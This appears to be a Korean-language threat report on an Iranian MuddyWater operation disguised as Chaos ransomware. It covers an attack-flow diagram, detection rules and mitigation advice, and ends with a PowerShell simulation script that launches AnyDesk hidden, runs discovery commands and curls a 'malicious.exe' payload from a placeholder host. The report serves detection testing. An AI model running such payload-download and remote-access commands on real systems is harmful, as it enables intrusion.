팔로우 
요약
2026년 초, 처음에는 단순한 Chaos 랜섬웨어 사건으로 보였던 것이 나중에는 이란 국가와 연결된 MuddyWater(Seedworm으로도 알려짐) 그룹과 관련된 허위 플래그 작전으로 식별되었습니다. 공격자들은 파일 암호화에 주력하지 않고 마이크로소프트 팀즈를 사용한 사회 공학, 자격 증명 및 MFA 토큰을 탈취하고, 원격 액세스 트로이 목마와 함께 맞춤형 다운로더를 배포했습니다. 이 작전은 MuddyWater와 관련된 인프라, 코드 서명 인증서를 재사용하며 데이터 도난 및 장기적인 지속적 접근을 목표로 했습니다.
조사
Rapid7 조사팀은 Teams 기반의 자격 증명 탈취부터 AnyDesk 및 DWAgent와 같은 합법적인 원격 관리 도구 사용에 이르기까지 침입 체인을 재구성한 후 ms_upd.exe를 전달했습니다. 이는 Game.exe라는 맞춤형 RAT를 검색했습니다. Game.exe를 포함한 명령 및 제어 도메인들이 확인되었습니다. moonzonet.com and uploadfiler.com을 비롯한 여러 관련 IP 주소 및 MuddyWater와 이전에 연결된 서명 인증서도 함께 발견되었습니다. 악성코드 분석에서는 반분석 행동, 단일 실행을 강요하는 뮤텍스, 서비스 및 숨겨진 파일을 사용하는 지속성 메커니즘이 드러났습니다.
완화 조치
조직은 더 강력한 MFA 보호를 시행하고, 원격 데스크톱 접근 및 Teams 화면 공유를 신뢰할 수 있는 계정으로 제한하며 낯선 상황에서 사용되는 합법적인 원격 접근 도구를 모니터링해야 합니다. 코드 서명된 바이너리에 대한 애플리케이션 허용 목록을 적용하고 사용자가 접근 가능한 디렉토리에서의 서명되지 않은 파일 실행을 차단해야 합니다. 또한 보안 팀은 인증서 사용을 정기적으로 감사하고, 해당 캠페인에 연관된 악성 도메인 및 IP 주소를 차단해야 합니다.
대응
이 활동이 감지되면 영향을 받은 시스템을 즉시 격리하고, 손상된 자격 증명 및 MFA 토큰을 취소하며, 전체 포렌식 수집을 시작하세요. 식별된 명령 및 제어 인프라를 차단하고, AnyDesk 및 DWAgent 서비스를 제거하며, 환경에서 맞춤형 RAT를 제거해야 합니다. 또한 mutex ATTRIBUTES_ObjectKernel 와 프로그램 데이터 아래에 있는 나머지 파일에 대한 위협 헌팅도 수행해야 합니다. ProgramData.
"graph TB %% 클래스 정의 classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#aaffaa classDef process fill:#ffcc99 classDef malware fill:#ff9999 %% 노드 – 동작 action_initial_access["<b>동작</b> – <b>T1566 피싱</b><br/>공격자는 사용자들을 가짜 퀵 어시스트 화면 공유 세션으로 유도하는 악성 Microsoft Teams 채팅 메시지를 보냈습니다."] class action_initial_access action action_user_exec_link["<b>동작</b> – <b>T1204.001 사용자 실행: 악성 링크</b><br/>피해자가 Teams를 통해 전달된 악성 링크를 클릭해 <i>ms_upd.exe</i>의 다운로드를 시작했습니다."] class action_user_exec_link action action_user_exec_copypaste["<b>동작</b> – <b>T1204.004 사용자 실행: 악성 복사 및 붙여넣기</b><br/>공격자는 사용자에게 자격 증명을 로컬로 생성된 텍스트 파일에 복사하여 붙여넣도록 지시했습니다."] class action_user_exec_copypaste action action_cred_access["<b>동작</b> – <b>T1552.008 안전하지 않은 자격 증명</b> & <b>T1078 유효 계정</b><br/>채팅 메시지에서 자격 증명을 수집하여 내부 시스템에 로그인하는 데 사용했습니다."] class action_cred_access action action_auth_mod["<b>동작</b> – <b>T1556.001 도메인 컨트롤러 인증</b><br/>손상된 자격 증명은 도메인 컨트롤러에 인증하여 특권 액세스를 얻는 데 사용되었습니다."] class action_auth_mod action action_discovery["<b>동작</b> – <b>T1082 시스템 정보 검색</b> & <b>T1016 시스템 네트워크 구성 검색</b><br/>악성코드는 ipconfig, whoami 등을 통해 호스트 이름, 사용자 이름, 도메인, IP 주소를 수집했습니다."] class action_discovery action action_ingress_transfer["<b>동작</b> – <b>T1105 도구 전송</b><br/><i>ms_upd.exe</i>는 curl을 사용하여 추가 페이로드(WebView2Loader.dll, Game.exe, visualwincomp.txt)를 다운로드했습니다."] class action_ingress_transfer action action_execution["<b>동작</b> – <b>T1059 명령 및 스크립팅 인터프리터</b><br/>공격자는 cmd.exe, PowerShell 및 pythonw.exe를 실행하여 다운로드한 바이너리를 실행했습니다."] class action_execution action action_process_injection["<b>동작</b> – <b>T1055.011 추가 창 메모리 주입</b> & <b>T1055.002 이동식 실행 파일 주입</b><br/>pythonw.exe는 RAT를 은밀하게 런칭하기 위해 일시 중단된 프로세스에 코드를 주입했습니다."] class action_process_injection action action_defense_evasion["<b>동작</b> – <b>T1027 난독화된 파일 또는 정보</b> & <b>T1497 가상화/샌드박스 회피</b><br/>페이로드는 XOR로 인코딩되고, AES-256-GCM으로 암호화되었습니다; 분석 DLL, VM 식별자 및 샌드박스 탐지를 회피하기 위한 타이밍을 확인합니다."] class action_defense_evasion action action_persistence["<b>동작</b> – <b>T1219 원격 접근 도구</b><br/>장기적인 원격 제어를 위한 DWAgent 서비스와 AnyDesk의 배포."] class action_persistence action action_lateral_movement["<b>동작</b> – <b>T1563 원격 서비스 세션 가로채기 (RDP)</b> & <b>T1668 독점적인 통제</b><br/>유효한 RDP 세션을 사용하여 횡적으로 이동하고 추가 호스트에 명령을 실행."] class action_lateral_movement action action_collection_exfil["<b>동작</b> – <b>T1560 수집된 데이터 보관</b> & <b>T1041 의 탈취</b><br/>데이터는 XORu2011암호화된 아카이브로 보관된 후 uploadfiler.com에 업로드되었습니다."] class action_collection_exfil action action_c2["<b>동작</b> – <b>T1090 프록시</b> & <b>T1573 암호화된 채널</b><br/>moonzonet.com, uploadfiler.com와 같은 C2 인프라와의 암호화된 페이로드로 HTTPS 통신을 하여 수행합니다."] class action_c2 action %% 노드 – 도구 / 파일 / 프로세스 / 악성코드 file_ms_upd["<b>파일</b> – <b>이름</b>: ms_upd.exe<br/><b>설명</b>: 추가 페이로드를 검색하는 초기 드로퍼."] class file_ms_upd file file_webview ["<b>파일</b> – <b>이름</b>: WebView2Loader.dll<br/><b>설명</b>: 웹 콘텐츠 렌더링을 위한 지원 DLL입니다."] class file_webview file file_game["<b>파일</b> – <b>이름</b>: Game.exe<br/><b>설명</b>: 다운로드 후 실행되는 2차 페이로드."] class file_game file file_visual["<b>파일</b> – <b>이름</b>: visualwincomp.txt<br/><b>설명</b>: 구성 데이터에 사용되는 텍스트 파일입니다."] class file_visual file process_cmd["<b>프로세스</b> – <b>이름</b>: cmd.exe<br/><b>목적</b>: 명령 줄 명령을 실행합니다."] class process_cmd process process_ps["<b>프로세스</b> – <b>이름</b>: PowerShell<br/><b>목적</b>: 페이로드 실행을 위한 PowerShell 스크립트를 실행합니다."] class process_ps process process_python["<b>프로세스</b> – <b>이름</b>: pythonw.exe<br/><b>목적</b>: Python 기반 구성 요소를 실행하고 프로세스 주입을 수행합니다."] class process_python process malware_dwaga["<b>악성코드</b> – <b>이름</b>: DWAgent 서비스<br/><b>목적</b>: 지속적인 원격 액세스를 제공합니다."] class malware_dwaga malware tool_anydesk["<b>도구</b> – <b>이름</b>: AnyDesk<br/><b>설명</b>: 지속성과 횡적 이동을 위한 합법적인 원격 데스크톱 유틸리티입니다."] class tool_anydesk tool %% 연결 – 흐름 action_initial_access –>|로 이동| action_user_exec_link action_user_exec_link –>|다운로드| file_ms_upd action_user_exec_link –>|로 이동| action_user_exec_copypaste action_user_exec_copypaste –>|제공| action_cred_access action_cred_access –>|활성화| action_auth_mod action_auth_mod –>|활성화| action_discovery action_discovery –>|트리거| action_ingress_transfer action_ingress_transfer –>|다운로드| file_webview action_ingress_transfer –>|다운로드| file_game action_ingress_transfer –>|다운로드| file_visual action_ingress_transfer –>|로 이동| action_execution action_execution –>|실행| process_cmd action_execution –>|실행| process_ps action_execution –>|실행| process_python process_python –>|주입| action_process_injection action_process_injection –>|촉진| action_defense_evasion action_defense_evasion –>|활성화| action_persistence action_persistence –>|설치| malware_dwaga action_persistence –>|설치| tool_anydesk malware_dwaga –>|지원| action_lateral_movement tool_anydesk –>|지원| action_lateral_movement action_lateral_movement –>|수집| action_collection_exfil action_collection_exfil –>|C2 채널을 통해 탈취| action_c2 %% 스타일 class action_initial_access,action_user_exec_link,action_user_exec_copypaste,action_cred_access,action_auth_mod,action_discovery,action_ingress_transfer,action_execution,action_process_injection,action_defense_evasion,action_persistence,action_lateral_movement,action_collection_exfil,action_c2 action class file_ms_upd,file_webview,file_game,file_visual file class process_cmd,process_ps,process_python process class malware_dwaga malware class tool_anydesk tool "
공격 흐름
탐지
가능한 시스템 네트워크 구성 검색 (cmdline 통해)
보기
지연 실행을 위한 PING 사용 가능성 (cmdline 통해)
보기
대체 원격 액세스 / 관리 소프트웨어 (프로세스 생성 통해)
보기
의심스러운 CURL 사용 (cmdline 통해)
보기
의심스러운 파일 다운로드 직접 IP (프록시 통해)
보기
IOC (HashSha256) 감지: Muddying the Tracks: Chaos 랜섬웨어 뒤에 있는 국가 후원 그림자
보기
IOC (HashSha1) 감지: Muddying the Tracks: Chaos 랜섬웨어 뒤에 있는 국가 후원 그림자
보기
IOC (HashMd5) 감지: Muddying the Tracks: Chaos 랜섬웨어 뒤에 있는 국가 후원 그림자
보기
IOC (SourceIP) 감지: Muddying the Tracks: Chaos 랜섬웨어 뒤에 있는 국가 후원 그림자
보기
IOC (DestinationIP) 감지: Muddying the Tracks: Chaos 랜섬웨어 뒤에 있는 국가 후원 그림자
보기
의심스러운 원격 관리 도구 및 검색 명령 실행 [Windows 프로세스 생성]
보기
인터랙티브 로그인 및 MFA 구성 변경 탐지 [Microsoft Windows Security 이벤트 로그]
보기
시뮬레이션 실행
전제 조건: Telemetry & Baseline 사전 점검이 통과해야 합니다.
이유: 이 섹션은 탐지 규칙을 트리거하기 위해 설계된 공격 기법(TTP)의 정확한 실행을 자세히 설명합니다. 명령 및 서사는 식별된 TTP를 직접 반영하고 탐지 논리가 예상하는 정확한 텔레메트리를 생성하는 것을 목표로 해야 합니다.
-
공격 내러티브 및 명령:
- 정당한 원격 관리 도구를 사용하여 원격 포트홀드를 확립하다 AnyDesk.exe AnyDesk.exe (“remote-tool” 선택기를 미러링).
- 네트워크 재콘을 수행합니다. 을 실행하여
ipconfigandwhoami같은 세션에서 발견된 명령어 선택 값을 포함하여 만족합니다. - 악의적인 페이로드를 다운로드 하여 사용
curl을 통해cmd.exe는 ‘도구 전송'(T1105) 및 ‘명령 줄 인터페이스'(T1059)의 고전적인 기법입니다. - 킬 체인을 완료하기 위해 페이로드 실행 (규칙 검증에는 필수는 아니지만 현실성을 위해 포함됨).
-
회귀 테스트 스크립트:
# ------------------------------------------------- # 시뮬레이션 스크립트 – Sigma 규칙을 트리거합니다 # ------------------------------------------------- # 1. AnyDesk 시작 (시뮬레이션 – AnyDesk가 PATH에 있다고 가정) Start-Process -FilePath "AnyDesk.exe" -ArgumentList "--no-sandbox" -WindowStyle Hidden # 2. 검색 명령어 실행 $discovery = @( "ipconfig /all", "whoami", "net start" ) foreach ($cmd in $discovery) { cmd.exe /c $cmd | Out-Null } # 3. cmd.exe + curl 사용하여 더미 페이로드 가져오기 $payloadUrl = "http://example.com/malicious.exe" $outputPath = "$env:TEMPpayload.exe" $downloadCmd = "curl $payloadUrl -o $outputPath" cmd.exe /c $downloadCmd # 선택사항: 페이로드 실행 (안전을 위해 주석 처리됨) # Start-Process -FilePath $outputPath -WindowStyle Hidden # ------------------------------------------------- -
정리 명령:
# 시작된 경우 AnyDesk 중지 Get-Process -Name "AnyDesk" -ErrorAction SilentlyContinue | Stop-Process -Force # 다운로드한 페이로드 제거 Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # 스크립트에 의해 생성된 잔류 cmd.exe 인스턴스 지우기 Get-Process -Name "cmd" -ErrorAction SilentlyContinue | Stop-Process -Force
보고서 종료